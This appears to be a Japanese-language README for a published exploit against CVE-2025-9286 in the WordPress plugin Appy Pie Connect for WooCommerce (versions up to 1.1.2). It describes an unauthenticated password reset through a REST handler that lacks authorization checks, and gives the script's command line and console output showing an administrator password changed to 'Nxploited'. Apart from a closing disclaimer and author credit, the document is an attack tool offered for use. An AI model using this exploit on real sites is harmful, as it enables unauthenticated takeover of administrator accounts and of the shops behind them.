
Appy Pie Connect for WooCommerce <= 1.1.2 - 認可の欠如による未認証の権限昇格
Appy Pie Connect for WooCommerce <= 1.1.2 - 認可の欠如による未認証の権限昇格
WordPress用プラグイン「Appy Pie Connect for WooCommerce」は、バージョン1.1.2以前の全バージョンにおいて、reset_user_password() RESTハンドラー内の認可の欠如により、権限昇格の脆弱性が存在します。
これにより、認証されていない攻撃者が管理者を含む任意のユーザーのパスワードをリセットし、管理者アクセスを取得することが可能になります。
以下のエクスプロイトは、脆弱性のあるプラグインバージョンを実行しているWordPressサイトに対してCVE-2025-9286を悪用するために使用できます。
スクリプト名: CVE-2025-9286.py
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.
このエクスプロイトは、教育および許可を得たペネトレーションテストの目的のみで使用してください。
明示的な許可なくシステムに対して不正に使用することは違法です。
作者は、このツールによって引き起こされた誤用や損害について一切の責任を負いません。
作成者: Khaled Alenazi (Nxploited)